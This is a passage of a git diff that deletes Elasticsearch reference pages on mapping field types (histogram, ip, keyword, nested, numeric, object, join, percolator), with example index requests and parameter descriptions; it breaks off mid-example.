`values` array correspond to the elements in the -same position of the `count` array, these two arrays must have the same length. - -[IMPORTANT] -======== -* A `histogram` field can only store a single pair of `values` and `count` arrays -per document. Nested arrays are not supported. -* `histogram` fields do not support sorting. -======== - -[[histogram-uses]] -==== Uses - -`histogram` fields are primarily intended for use with aggregations. To make it -more readily accessible for aggregations, `histogram` field data is stored as a -binary <> and not indexed. Its size in bytes is at most -`13 * numValues`, where `numValues` is the length of the provided arrays. - -Because the data is not indexed, you only can use `histogram` fields for the -following aggregations and queries: - -* <> aggregation -* <> aggregation -* <> aggregation -* <> aggregation -* <> aggregation -* <> aggregation -* <> aggregation -* <> aggregation -* <> aggregation -* <> query - -[[mapping-types-histogram-building-histogram]] -==== Building a histogram - -When using a histogram as part of an aggregation, the accuracy of the results will depend on how the -histogram was constructed. It is important to consider the percentiles aggregation mode that will be used -to build it. Some possibilities include: - -- For the <> mode, the `values` array represents -the mean centroid positions and the `counts` array represents the number of values that are attributed to each -centroid. If the algorithm has already started to approximate the percentiles, this inaccuracy is -carried over in the histogram. - -- For the <<_hdr_histogram,High Dynamic Range (HDR)>> histogram mode, the `values` array represents fixed upper -limits of each bucket interval, and the `counts` array represents the number of values that are attributed to each -interval. This implementation maintains a fixed worse-case percentage error (specified as a number of significant digits), -therefore the value used when generating the histogram would be the maximum accuracy you can achieve at aggregation time. - -The histogram field is "algorithm agnostic" and does not store data specific to either T-Digest or HDRHistogram. While this -means the field can technically be aggregated with either algorithm, in practice the user should chose one algorithm and -index data in that manner (e.g. centroids for T-Digest or intervals for HDRHistogram) to ensure best accuracy. - -[[histogram-ex]] -==== Examples - -The following <> API request creates a new index with two field mappings: - -* `my_histogram`, a `histogram` field used to store percentile data -* `my_text`, a `keyword` field used to store a title for the histogram - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings" : { - "properties" : { - "my_histogram" : { - "type" : "histogram" - }, - "my_text" : { - "type" : "keyword" - } - } - } -} --------------------------------------------------- - -The following <> API requests store pre-aggregated for -two histograms: `histogram_1` and `histogram_2`. - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/1 -{ - "my_text" : "histogram_1", - "my_histogram" : { - "values" : [0.1, 0.2, 0.3, 0.4, 0.5], <1> - "counts" : [3, 7, 23, 12, 6] <2> - } -} - -PUT my-index-000001/_doc/2 -{ - "my_text" : "histogram_2", - "my_histogram" : { - "values" : [0.1, 0.25, 0.35, 0.4, 0.45, 0.5], <1> - "counts" : [8, 17, 8, 7, 6, 2] <2> - } -} --------------------------------------------------- -<1> Values for each bucket. Values in the array are treated as doubles and must be given in -increasing order. For <> -histograms this value represents the mean value. In case of HDR histograms this represents the value iterated to. -<2> Count for each bucket. Values in the arrays are treated as integers and must be positive or zero. -Negative values will be rejected. The relation between a bucket and a count is given by the position in the array. diff --git a/docs/reference/mapping/types/ip.asciidoc b/docs/reference/mapping/types/ip.asciidoc deleted file mode 100644 index c8336cd816b..00000000000 --- a/docs/reference/mapping/types/ip.asciidoc +++ /dev/null @@ -1,127 +0,0 @@ -[[ip]] -=== IP field type -++++ -IP -++++ - -An `ip` field can index/store either {wikipedia}/IPv4[IPv4] or -{wikipedia}/IPv6[IPv6] addresses. - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "ip_addr": { - "type": "ip" - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "ip_addr": "192.168.1.1" -} - -GET my-index-000001/_search -{ - "query": { - "term": { - "ip_addr": "192.168.0.0/16" - } - } -} --------------------------------------------------- -// TESTSETUP - -NOTE: You can also store ip ranges in a single field using an <>. - -[[ip-params]] -==== Parameters for `ip` fields - -The following parameters are accepted by `ip` fields: - -[horizontal] - -<>:: - - Mapping field-level query time boosting. Accepts a floating point number, defaults - to `1.0`. - -<>:: - - Should the field be stored on disk in a column-stride fashion, so that it - can later be used for sorting, aggregations, or scripting? Accepts `true` - (default) or `false`. - -<>:: - - If `true`, malformed IP addresses are ignored. If `false` (default), malformed - IP addresses throw an exception and reject the whole document. - -<>:: - - Should the field be searchable? Accepts `true` (default) and `false`. - -<>:: - - Accepts an IPv4 or IPv6 value which is substituted for any explicit `null` values. - Defaults to `null`, which means the field is treated as missing. - -<>:: - - Whether the field value should be stored and retrievable separately from - the <> field. Accepts `true` or `false` - (default). - -[[query-ip-fields]] -==== Querying `ip` fields - -The most common way to query ip addresses is to use the -{wikipedia}/Classless_Inter-Domain_Routing#CIDR_notation[CIDR] -notation: `[ip_address]/[prefix_length]`. For instance: - -[source,console] --------------------------------------------------- -GET my-index-000001/_search -{ - "query": { - "term": { - "ip_addr": "192.168.0.0/16" - } - } -} --------------------------------------------------- - -or - -[source,console] --------------------------------------------------- -GET my-index-000001/_search -{ - "query": { - "term": { - "ip_addr": "2001:db8::/48" - } - } -} --------------------------------------------------- - -Also beware that colons are special characters to the -<> query, so ipv6 addresses will -need to be escaped. The easiest way to do so is to put quotes around the -searched value: - -[source,console] --------------------------------------------------- -GET my-index-000001/_search -{ - "query": { - "query_string" : { - "query": "ip_addr:\"2001:db8::/48\"" - } - } -} --------------------------------------------------- diff --git a/docs/reference/mapping/types/keyword.asciidoc b/docs/reference/mapping/types/keyword.asciidoc deleted file mode 100644 index b97af789f3b..00000000000 --- a/docs/reference/mapping/types/keyword.asciidoc +++ /dev/null @@ -1,137 +0,0 @@ -[testenv="basic"] -[[keyword]] -=== Keyword type family -++++ -Keyword -++++ - -The keyword family includes the following field types: - -* <>, which is used for structured content such as IDs, email -addresses, hostnames, status codes, zip codes, or tags. -* <> for keyword fields that always contain -the same value. -* <>, which optimizes log lines and similar keyword values -for grep-like <>. - -Keyword fields are often used in <>, -<>, and <>, such as <>. - -TIP: Avoid using keyword fields for full-text search. Use the <> -field type instead. - -[discrete] -[[keyword-field-type]] -=== Keyword field type - -Below is an example of a mapping for a basic `keyword` field: - -[source,console] --------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "tags": { - "type": "keyword" - } - } - } -} --------------------------------- - -[TIP] -.Mapping numeric identifiers -==== -include::numeric.asciidoc[tag=map-ids-as-keyword] -==== - -[discrete] -[[keyword-params]] -==== Parameters for basic keyword fields - -The following parameters are accepted by `keyword` fields: - -[horizontal] - -<>:: - - Mapping field-level query time boosting. Accepts a floating point number, defaults - to `1.0`. - -<>:: - - Should the field be stored on disk in a column-stride fashion, so that it - can later be used for sorting, aggregations, or scripting? Accepts `true` - (default) or `false`. - -<>:: - - Should global ordinals be loaded eagerly on refresh? Accepts `true` or `false` - (default). Enabling this is a good idea on fields that are frequently used for - terms aggregations. - -<>:: - - Multi-fields allow the same string value to be indexed in multiple ways for - different purposes, such as one field for search and a multi-field for - sorting and aggregations. - -<>:: - - Do not index any string longer than this value. Defaults to `2147483647` - so that all values would be accepted. Please however note that default - dynamic mapping rules create a sub `keyword` field that overrides this - default by setting `ignore_above: 256`. - -<>:: - - Should the field be searchable? Accepts `true` (default) or `false`. - -<>:: - - What information should be stored in the index, for scoring purposes. - Defaults to `docs` but can also be set to `freqs` to take term frequency into account - when computing scores. - -<>:: - - Whether field-length should be taken into account when scoring queries. - Accepts `true` or `false` (default). - -<>:: - - Accepts a string value which is substituted for any explicit `null` - values. Defaults to `null`, which means the field is treated as missing. - -<>:: - - Whether the field value should be stored and retrievable separately from - the <> field. Accepts `true` or `false` - (default). - -<>:: - - Which scoring algorithm or _similarity_ should be used. Defaults - to `BM25`. - -<>:: - - How to pre-process the keyword prior to indexing. Defaults to `null`, - meaning the keyword is kept as-is. - -`split_queries_on_whitespace`:: - - Whether <> should split the input on whitespace - when building a query for this field. - Accepts `true` or `false` (default). - -<>:: - - Metadata about the field. - -include::constant-keyword.asciidoc[] - -include::wildcard.asciidoc[] - diff --git a/docs/reference/mapping/types/nested.asciidoc b/docs/reference/mapping/types/nested.asciidoc deleted file mode 100644 index 20057d9ccd7..00000000000 --- a/docs/reference/mapping/types/nested.asciidoc +++ /dev/null @@ -1,235 +0,0 @@ -[[nested]] -=== Nested field type -++++ -Nested -++++ - -The `nested` type is a specialised version of the <> data type -that allows arrays of objects to be indexed in a way that they can be queried -independently of each other. - -TIP: When ingesting key-value pairs with a large, arbitrary set of keys, you might consider modeling each key-value pair as its own nested document with `key` and `value` fields. Instead, consider using the <> data type, which maps an entire object as a single field and allows for simple searches over its contents. -Nested documents and queries are typically expensive, so using the `flattened` data type for this use case is a better option. - -[[nested-arrays-flattening-objects]] -==== How arrays of objects are flattened - -Elasticsearch has no concept of inner objects. Therefore, it flattens object -hierarchies into a simple list of field names and values. For instance, consider the -following document: - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/1 -{ - "group" : "fans", - "user" : [ <1> - { - "first" : "John", - "last" : "Smith" - }, - { - "first" : "Alice", - "last" : "White" - } - ] -} --------------------------------------------------- - -<1> The `user` field is dynamically added as a field of type `object`. - -The previous document would be transformed internally into a document that looks more like this: - -[source,js] --------------------------------------------------- -{ - "group" : "fans", - "user.first" : [ "alice", "john" ], - "user.last" : [ "smith", "white" ] -} --------------------------------------------------- -// NOTCONSOLE - -The `user.first` and `user.last` fields are flattened into multi-value fields, -and the association between `alice` and `white` is lost. This document would -incorrectly match a query for `alice AND smith`: - -[source,console] --------------------------------------------------- -GET my-index-000001/_search -{ - "query": { - "bool": { - "must": [ - { "match": { "user.first": "Alice" }}, - { "match": { "user.last": "Smith" }} - ] - } - } -} --------------------------------------------------- -// TEST[continued] - -[[nested-fields-array-objects]] -==== Using `nested` fields for arrays of objects - -If you need to index arrays of objects and to maintain the independence of -each object in the array, use the `nested` data type instead of the -<> data type. - -Internally, nested objects index each object in -the array as a separate hidden document, meaning that each nested object can be -queried independently of the others with the <>: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "user": { - "type": "nested" <1> - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "group" : "fans", - "user" : [ - { - "first" : "John", - "last" : "Smith" - }, - { - "first" : "Alice", - "last" : "White" - } - ] -} - -GET my-index-000001/_search -{ - "query": { - "nested": { - "path": "user", - "query": { - "bool": { - "must": [ - { "match": { "user.first": "Alice" }}, - { "match": { "user.last": "Smith" }} <2> - ] - } - } - } - } -} - -GET my-index-000001/_search -{ - "query": { - "nested": { - "path": "user", - "query": { - "bool": { - "must": [ - { "match": { "user.first": "Alice" }}, - { "match": { "user.last": "White" }} <3> - ] - } - }, - "inner_hits": { <4> - "highlight": { - "fields": { - "user.first": {} - } - } - } - } - } -} --------------------------------------------------- - -<1> The `user` field is mapped as type `nested` instead of type `object`. -<2> This query doesn't match because `Alice` and `Smith` are not in the same nested object. -<3> This query matches because `Alice` and `White` are in the same nested object. -<4> `inner_hits` allow us to highlight the matching nested documents. - - -[[nested-accessing-documents]] -==== Interacting with `nested` documents -Nested documents can be: - -* queried with the <> query. -* analyzed with the <> - and <> - aggregations. -* sorted with <>. -* retrieved and highlighted with <>. - -[IMPORTANT] -============================================= - -Because nested documents are indexed as separate documents, they can only be -accessed within the scope of the `nested` query, the -`nested`/`reverse_nested` aggregations, or <>. - -For instance, if a string field within a nested document has -<> set to `offsets` to allow use of the postings -during the highlighting, these offsets will not be available during the main highlighting -phase. Instead, highlighting needs to be performed via -<>. The same consideration applies when loading -fields during a search through <> or <>. - -============================================= - -[[nested-params]] -==== Parameters for `nested` fields - -The following parameters are accepted by `nested` fields: - -<>:: -(Optional, string) -Whether or not new `properties` should be added dynamically to an existing -nested object. Accepts `true` (default), `false` and `strict`. - -<>:: -(Optional, object) -The fields within the nested object, which can be of any -<>, including `nested`. New properties -may be added to an existing nested object. - -[[nested-include-in-parent-parm]] -`include_in_parent`:: -(Optional, Boolean) -If `true`, all fields in the nested object are also added to the parent document -as standard (flat) fields. Defaults to `false`. - -[[nested-include-in-root-parm]] -`include_in_root`:: -(Optional, Boolean) -If `true`, all fields in the nested object are also added to the root -document as standard (flat) fields. Defaults to `false`. - -[discrete] -=== Limits on `nested` mappings and objects - -As described earlier, each nested object is indexed as a separate Lucene document. -Continuing with the previous example, if we indexed a single document containing 100 `user` objects, -then 101 Lucene documents would be created: one for the parent document, and one for each -nested object. Because of the expense associated with `nested` mappings, Elasticsearch puts -settings in place to guard against performance problems: - -include::{es-repo-dir}/mapping.asciidoc[tag=nested-fields-limit] - -In the previous example, the `user` mapping would count as only 1 towards this limit. - -include::{es-repo-dir}/mapping.asciidoc[tag=nested-objects-limit] - -To illustrate how this setting works, consider adding another `nested` type called `comments` -to the previous example mapping. For each document, the combined number of `user` and `comment` -objects it contains must be below the limit. - -See <> regarding additional settings for preventing mappings explosion. diff --git a/docs/reference/mapping/types/numeric.asciidoc b/docs/reference/mapping/types/numeric.asciidoc deleted file mode 100644 index d6f4be0a8dc..00000000000 --- a/docs/reference/mapping/types/numeric.asciidoc +++ /dev/null @@ -1,172 +0,0 @@ -[[number]] -=== Numeric field types -++++ -Numeric -++++ - -The following numeric types are supported: - -[horizontal] -`long`:: A signed 64-bit integer with a minimum value of +-2^63^+ and a maximum value of +2^63^-1+. -`integer`:: A signed 32-bit integer with a minimum value of +-2^31^+ and a maximum value of +2^31^-1+. -`short`:: A signed 16-bit integer with a minimum value of +-32,768+ and a maximum value of +32,767+. -`byte`:: A signed 8-bit integer with a minimum value of +-128+ and a maximum value of +127+. -`double`:: A double-precision 64-bit IEEE 754 floating point number, restricted to finite values. -`float`:: A single-precision 32-bit IEEE 754 floating point number, restricted to finite values. -`half_float`:: A half-precision 16-bit IEEE 754 floating point number, restricted to finite values. -`scaled_float`:: A floating point number that is backed by a `long`, scaled by a fixed `double` scaling factor. -`unsigned_long`:: An unsigned 64-bit integer with a minimum value of 0 and a maximum value of +2^64^-1+. - -Below is an example of configuring a mapping with numeric fields: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "number_of_bytes": { - "type": "integer" - }, - "time_in_seconds": { - "type": "float" - }, - "price": { - "type": "scaled_float", - "scaling_factor": 100 - } - } - } -} --------------------------------------------------- - -NOTE: The `double`, `float` and `half_float` types consider that `-0.0` and -`+0.0` are different values. As a consequence, doing a `term` query on -`-0.0` will not match `+0.0` and vice-versa. Same is true for range queries: -if the upper bound is `-0.0` then `+0.0` will not match, and if the lower -bound is `+0.0` then `-0.0` will not match. - -==== Which type should I use? - -As far as integer types (`byte`, `short`, `integer` and `long`) are concerned, -you should pick the smallest type which is enough for your use-case. This will -help indexing and searching be more efficient. Note however that storage is -optimized based on the actual values that are stored, so picking one type over -another one will have no impact on storage requirements. - -For floating-point types, it is often more efficient to store floating-point -data into an integer using a scaling factor, which is what the `scaled_float` -type does under the hood. For instance, a `price` field could be stored in a -`scaled_float` with a `scaling_factor` of +100+. All APIs would work as if -the field was stored as a double, but under the hood Elasticsearch would be -working with the number of cents, +price*100+, which is an integer. This is -mostly helpful to save disk space since integers are way easier to compress -than floating points. `scaled_float` is also fine to use in order to trade -accuracy for disk space. For instance imagine that you are tracking cpu -utilization as a number between +0+ and +1+. It usually does not matter much -whether cpu utilization is +12.7%+ or +13%+, so you could use a `scaled_float` -with a `scaling_factor` of +100+ in order to round cpu utilization to the -closest percent in order to save space. - -If `scaled_float` is not a good fit, then you should pick the smallest type -that is enough for the use-case among the floating-point types: `double`, -`float` and `half_float`. Here is a table that compares these types in order -to help make a decision. - -[cols="<,<,<,<",options="header",] -|======================================================================= -|Type |Minimum value |Maximum value |Significant bits / digits -|`double`|+2^-1074^+ |+(2-2^-52^)·2^1023^+ |+53+ / +15.95+ -|`float`|+2^-149^+ |+(2-2^-23^)·2^127^+ |+24+ / +7.22+ -|`half_float`|+2^-24^+ |+65504+ |+11+ / +3.31+ -|======================================================================= - -[TIP] -.Mapping numeric identifiers -==== -// tag::map-ids-as-keyword[] -Not all numeric data should be mapped as a <> field data type. -{es} optimizes numeric fields, such as `integer` or `long`, for -<> queries. However, <> fields -are better for <> and other -<> queries. - -Identifiers, such as an ISBN or a product ID, are rarely used in `range` -queries. However, they are often retrieved using term-level queries. - -Consider mapping a numeric identifier as a `keyword` if: - -* You don't plan to search for the identifier data using - <> queries. -* Fast retrieval is important. `term` query searches on `keyword` fields are - often faster than `term` searches on numeric fields. - -If you're unsure which to use, you can use a <> to map -the data as both a `keyword` _and_ a numeric data type. -// end::map-ids-as-keyword[] -==== - -[[number-params]] -==== Parameters for numeric fields - -The following parameters are accepted by numeric types: - -[horizontal] - -<>:: - - Try to convert strings to numbers and truncate fractions for integers. - Accepts `true` (default) and `false`. Not applicable for `unsigned_long`. - -<>:: - - Mapping field-level query time boosting. Accepts a floating point number, defaults - to `1.0`. - -<>:: - - Should the field be stored on disk in a column-stride fashion, so that it - can later be used for sorting, aggregations, or scripting? Accepts `true` - (default) or `false`. - -<>:: - - If `true`, malformed numbers are ignored. If `false` (default), malformed - numbers throw an exception and reject the whole document. - -<>:: - - Should the field be searchable? Accepts `true` (default) and `false`. - -<>:: - - Accepts a numeric value of the same `type` as the field which is - substituted for any explicit `null` values. Defaults to `null`, which - means the field is treated as missing. - -<>:: - - Whether the field value should be stored and retrievable separately from - the <> field. Accepts `true` or `false` - (default). - -<>:: - - Metadata about the field. - -[[scaled-float-params]] -==== Parameters for `scaled_float` - -`scaled_float` accepts an additional parameter: - -[horizontal] - -`scaling_factor`:: - - The scaling factor to use when encoding values. Values will be multiplied - by this factor at index time and rounded to the closest long value. For - instance, a `scaled_float` with a `scaling_factor` of +10+ would internally - store +2.34+ as +23+ and all search-time operations (queries, aggregations, - sorting) will behave as if the document had a value of +2.3+. High values - of `scaling_factor` improve accuracy but also increase space requirements. - This parameter is required. diff --git a/docs/reference/mapping/types/object.asciidoc b/docs/reference/mapping/types/object.asciidoc deleted file mode 100644 index 0a68bb3b2e7..00000000000 --- a/docs/reference/mapping/types/object.asciidoc +++ /dev/null @@ -1,100 +0,0 @@ -[[object]] -=== Object field type -++++ -Object -++++ - -JSON documents are hierarchical in nature: the document may contain inner -objects which, in turn, may contain inner objects themselves: - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/1 -{ <1> - "region": "US", - "manager": { <2> - "age": 30, - "name": { <3> - "first": "John", - "last": "Smith" - } - } -} --------------------------------------------------- - -<1> The outer document is also a JSON object. -<2> It contains an inner object called `manager`. -<3> Which in turn contains an inner object called `name`. - -Internally, this document is indexed as a simple, flat list of key-value -pairs, something like this: - -[source,js] --------------------------------------------------- -{ - "region": "US", - "manager.age": 30, - "manager.name.first": "John", - "manager.name.last": "Smith" -} --------------------------------------------------- -// NOTCONSOLE - -An explicit mapping for the above document could look like this: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { <1> - "region": { - "type": "keyword" - }, - "manager": { <2> - "properties": { - "age": { "type": "integer" }, - "name": { <3> - "properties": { - "first": { "type": "text" }, - "last": { "type": "text" } - } - } - } - } - } - } -} --------------------------------------------------- - -<1> Properties in the top-level mappings definition. -<2> The `manager` field is an inner `object` field. -<3> The `manager.name` field is an inner `object` field within the `manager` field. - -You are not required to set the field `type` to `object` explicitly, as this is the default value. - -[[object-params]] -==== Parameters for `object` fields - -The following parameters are accepted by `object` fields: - -[horizontal] -<>:: - - Whether or not new `properties` should be added dynamically - to an existing object. Accepts `true` (default), `false` - and `strict`. - -<>:: - - Whether the JSON value given for the object field should be - parsed and indexed (`true`, default) or completely ignored (`false`). - -<>:: - - The fields within the object, which can be of any - <>, including `object`. New properties - may be added to an existing object. - -IMPORTANT: If you need to index arrays of objects instead of single objects, -read <> first. diff --git a/docs/reference/mapping/types/parent-join.asciidoc b/docs/reference/mapping/types/parent-join.asciidoc deleted file mode 100644 index 4960bcae588..00000000000 --- a/docs/reference/mapping/types/parent-join.asciidoc +++ /dev/null @@ -1,439 +0,0 @@ -[[parent-join]] -=== Join field type -++++ -Join -++++ - -The `join` data type is a special field that creates -parent/child relation within documents of the same index. -The `relations` section defines a set of possible relations within the documents, -each relation being a parent name and a child name. -A parent/child relation can be defined as follows: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "my_id": { - "type": "keyword" - }, - "my_join_field": { <1> - "type": "join", - "relations": { - "question": "answer" <2> - } - } - } - } -} --------------------------------------------------- - -<1> The name for the field -<2> Defines a single relation where `question` is parent of `answer`. - -To index a document with a join, the name of the relation and the optional parent -of the document must be provided in the `source`. -For instance the following example creates two `parent` documents in the `question` context: - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/1?refresh -{ - "my_id": "1", - "text": "This is a question", - "my_join_field": { - "name": "question" <1> - } -} - -PUT my-index-000001/_doc/2?refresh -{ - "my_id": "2", - "text": "This is another question", - "my_join_field": { - "name": "question" - } -} --------------------------------------------------- -// TEST[continued] - -<1> This document is a `question` document. - -When indexing parent documents, you can choose to specify just the name of the relation -as a shortcut instead of encapsulating it in the normal object notation: - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/1?refresh -{ - "my_id": "1", - "text": "This is a question", - "my_join_field": "question" <1> -} - -PUT my-index-000001/_doc/2?refresh -{ - "my_id": "2", - "text": "This is another question", - "my_join_field": "question" -} --------------------------------------------------- -// TEST[continued] - -<1> Simpler notation for a parent document just uses the relation name. - -When indexing a child, the name of the relation as well as the parent id of the document -must be added in the `_source`. - -WARNING: It is required to index the lineage of a parent in the same shard so you must -always route child documents using their greater parent id. - -For instance the following example shows how to index two `child` documents: - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/3?routing=1&refresh <1> -{ - "my_id": "3", - "text": "This is an answer", - "my_join_field": { - "name": "answer", <2> - "parent": "1" <3> - } -} - -PUT my-index-000001/_doc/4?routing=1&refresh -{ - "my_id": "4", - "text": "This is another answer", - "my_join_field": { - "name": "answer", - "parent": "1" - } -} --------------------------------------------------- -// TEST[continued] - -<1> The routing value is mandatory because parent and child documents must be indexed on the same shard -<2> `answer` is the name of the join for this document -<3> The parent id of this child document - -==== Parent-join and performance - -The join field shouldn't be used like joins in a relation database. In Elasticsearch the key to good performance -is to de-normalize your data into documents. Each join field, `has_child` or `has_parent` query adds a -significant tax to your query performance. It can also trigger <> to be built. - -The only case where the join field makes sense is if your data contains a one-to-many relationship where -one entity significantly outnumbers the other entity. An example of such case is a use case with products -and offers for these products. In the case that offers significantly outnumbers the number of products then -it makes sense to model the product as parent document and the offer as child document. - -==== Parent-join restrictions - -* Only one `join` field mapping is allowed per index. -* Parent and child documents must be indexed on the same shard. - This means that the same `routing` value needs to be provided when - <>, <>, or <> - a child document. -* An element can have multiple children but only one parent. -* It is possible to add a new relation to an existing `join` field. -* It is also possible to add a child to an existing element - but only if the element is already a parent. - -==== Searching with parent-join - -The parent-join creates one field to index the name of the relation -within the document (`my_parent`, `my_child`, ...). - -It also creates one field per parent/child relation. -The name of this field is the name of the `join` field followed by `#` and the -name of the parent in the relation. -So for instance for the `my_parent` -> [`my_child`, `another_child`] relation, -the `join` field creates an additional field named `my_join_field#my_parent`. - -This field contains the parent `_id` that the document links to -if the document is a child (`my_child` or `another_child`) and the `_id` of -document if it's a parent (`my_parent`). - -When searching an index that contains a `join` field, these two fields are always -returned in the search response: - -[source,console] --------------------------- -GET my-index-000001/_search -{ - "query": { - "match_all": {} - }, - "sort": ["my_id"] -} --------------------------- -// TEST[continued] - -Will return: - -[source,console-result] --------------------------------------------------- -{ - ..., - "hits": { - "total": { - "value": 4, - "relation": "eq" - }, - "max_score": null, - "hits": [ - { - "_index": "my-index-000001", - "_type": "_doc", - "_id": "1", - "_score": null, - "_source": { - "my_id": "1", - "text": "This is a question", - "my_join_field": "question" <1> - }, - "sort": [ - "1" - ] - }, - { - "_index": "my-index-000001", - "_type": "_doc", - "_id": "2", - "_score": null, - "_source": { - "my_id": "2", - "text": "This is another question", - "my_join_field": "question" <2> - }, - "sort": [ - "2" - ] - }, - { - "_index": "my-index-000001", - "_type": "_doc", - "_id": "3", - "_score": null, - "_routing": "1", - "_source": { - "my_id": "3", - "text": "This is an answer", - "my_join_field": { - "name": "answer", <3> - "parent": "1" <4> - } - }, - "sort": [ - "3" - ] - }, - { - "_index": "my-index-000001", - "_type": "_doc", - "_id": "4", - "_score": null, - "_routing": "1", - "_source": { - "my_id": "4", - "text": "This is another answer", - "my_join_field": { - "name": "answer", - "parent": "1" - } - }, - "sort": [ - "4" - ] - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"timed_out": false, "took": $body.took, "_shards": $body._shards/] - -<1> This document belongs to the `question` join -<2> This document belongs to the `question` join -<3> This document belongs to the `answer` join -<4> The linked parent id for the child document - -==== Parent-join queries and aggregations - -See the <> and -<> queries, -the <> aggregation, -and <> for more information. - -The value of the `join` field is accessible in aggregations -and scripts, and may be queried with the -<>: - -[source,console] --------------------------- -GET my-index-000001/_search -{ - "query": { - "parent_id": { <1> - "type": "answer", - "id": "1" - } - }, - "aggs": { - "parents": { - "terms": { - "field": "my_join_field#question", <2> - "size": 10 - } - } - }, - "script_fields": { - "parent": { - "script": { - "source": "doc['my_join_field#question']" <3> - } - } - } -} --------------------------- -// TEST[continued] - -<1> Querying the `parent id` field (also see the <> and the <>) -<2> Aggregating on the `parent id` field (also see the <> aggregation) -<3> Accessing the parent id` field in scripts - - -==== Global ordinals - -The `join` field uses <> to speed up joins. -Global ordinals need to be rebuilt after any change to a shard. The more -parent id values are stored in a shard, the longer it takes to rebuild the -global ordinals for the `join` field. - -Global ordinals, by default, are built eagerly: if the index has changed, -global ordinals for the `join` field will be rebuilt as part of the refresh. -This can add significant time to the refresh. However most of the times this is the -right trade-off, otherwise global ordinals are rebuilt when the first parent-join -query or aggregation is used. This can introduce a significant latency spike for -your users and usually this is worse as multiple global ordinals for the `join` -field may be attempt rebuilt within a single refresh interval when many writes -are occurring. - -When the `join` field is used infrequently and writes occur frequently it may -make sense to disable eager loading: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "my_join_field": { - "type": "join", - "relations": { - "question": "answer" - }, - "eager_global_ordinals": false - } - } - } -} --------------------------------------------------- - -The amount of heap used by global ordinals can be checked per parent relation -as follows: - -[source,console] --------------------------------------------------- -# Per-index -GET _stats/fielddata?human&fields=my_join_field#question - -# Per-node per-index -GET _nodes/stats/indices/fielddata?human&fields=my_join_field#question --------------------------------------------------- -// TEST[continued] - -==== Multiple children per parent - -It is also possible to define multiple children for a single parent: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "my_join_field": { - "type": "join", - "relations": { - "question": ["answer", "comment"] <1> - } - } - } - } -} --------------------------------------------------- - -<1> `question` is parent of `answer` and `comment`. - -==== Multiple levels of parent join - -WARNING: Using multiple levels of relations to replicate a relational model is not recommended. -Each level of relation adds an overhead at query time in terms of memory and computation. -You should de-normalize your data if you care about performance. - -Multiple levels of parent/child: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "my_join_field": { - "type": "join", - "relations": { - "question": ["answer", "comment"], <1> - "answer": "vote" <2> - } - } - } - } -} --------------------------------------------------- - -<1> `question` is parent of `answer` and `comment` -<2> `answer` is parent of `vote` - -The mapping above represents the following tree: - - question - / \ - / \ - comment answer - | - | - vote - -Indexing a grandchild document requires a `routing` value equals -to the grand-parent (the greater parent of the lineage): - - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/3?routing=1&refresh <1> -{ - "text": "This is a vote", - "my_join_field": { - "name": "vote", - "parent": "2" <2> - } -} --------------------------------------------------- -// TEST[continued] - -<1> This child document must be on the same shard than its grand-parent and parent -<2> The parent id of this document (must points to an `answer` document) diff --git a/docs/reference/mapping/types/percolator.asciidoc b/docs/reference/mapping/types/percolator.asciidoc deleted file mode 100644 index 496941d4143..00000000000 --- a/docs/reference/mapping/types/percolator.asciidoc +++ /dev/null @@ -1,741 +0,0 @@ -[[percolator]] -=== Percolator field type -++++ -Percolator -++++ - -The `percolator` field type parses a json structure into a native query and -stores that query, so that the <> -can use it to match provided documents. - -Any field that contains a json object can be configured to be a percolator -field. The percolator field type has no settings. Just configuring the `percolator` -field type is sufficient to instruct Elasticsearch to treat a field as a -query. - -If the following mapping configures the `percolator` field type for the -`query` field: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "query": { - "type": "percolator" - }, - "field": { - "type": "text" - } - } - } -} --------------------------------------------------- -// TESTSETUP - -Then you can index a query: - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/match_value -{ - "query": { - "match": { - "field": "value" - } - } -} --------------------------------------------------- - -[IMPORTANT] -===================================== - -Fields referred to in a percolator query must *already* exist in the mapping -associated with the index used for percolation. In order to make sure these fields exist, -add or update a mapping via the <> or <> APIs. - -===================================== - -[discrete] -==== Reindexing your percolator queries - -Reindexing percolator queries is sometimes required to benefit from improvements made to the `percolator` field type in -new releases. - -Reindexing percolator queries can be reindexed by using the <>. -Lets take a look at the following index with a percolator field type: - -[source,console] --------------------------------------------------- -PUT index -{ - "mappings": { - "properties": { - "query" : { - "type" : "percolator" - }, - "body" : { - "type": "text" - } - } - } -} - -POST _aliases -{ - "actions": [ - { - "add": { - "index": "index", - "alias": "queries" <1> - } - } - ] -} - -PUT queries/_doc/1?refresh -{ - "query" : { - "match" : { - "body" : "quick brown fox" - } - } -} --------------------------------------------------- -// TEST[continued] - -<1> It is always recommended to define an alias for your index, so that in case of a reindex systems / applications - don't need to be changed to know that the percolator queries are now in a different index. - -Lets say you're going to upgrade to a new major version and in order for the new Elasticsearch version to still be able -to read your queries you need to reindex your queries into a new index on the current Elasticsearch version: - -[source,console] --------------------------------------------------- -PUT new_index -{ - "mappings": { - "properties": { - "query" : { - "type" : "percolator" - }, - "body" : { - "type": "text" - } - } - } -} - -POST /_reindex?refresh -{ - 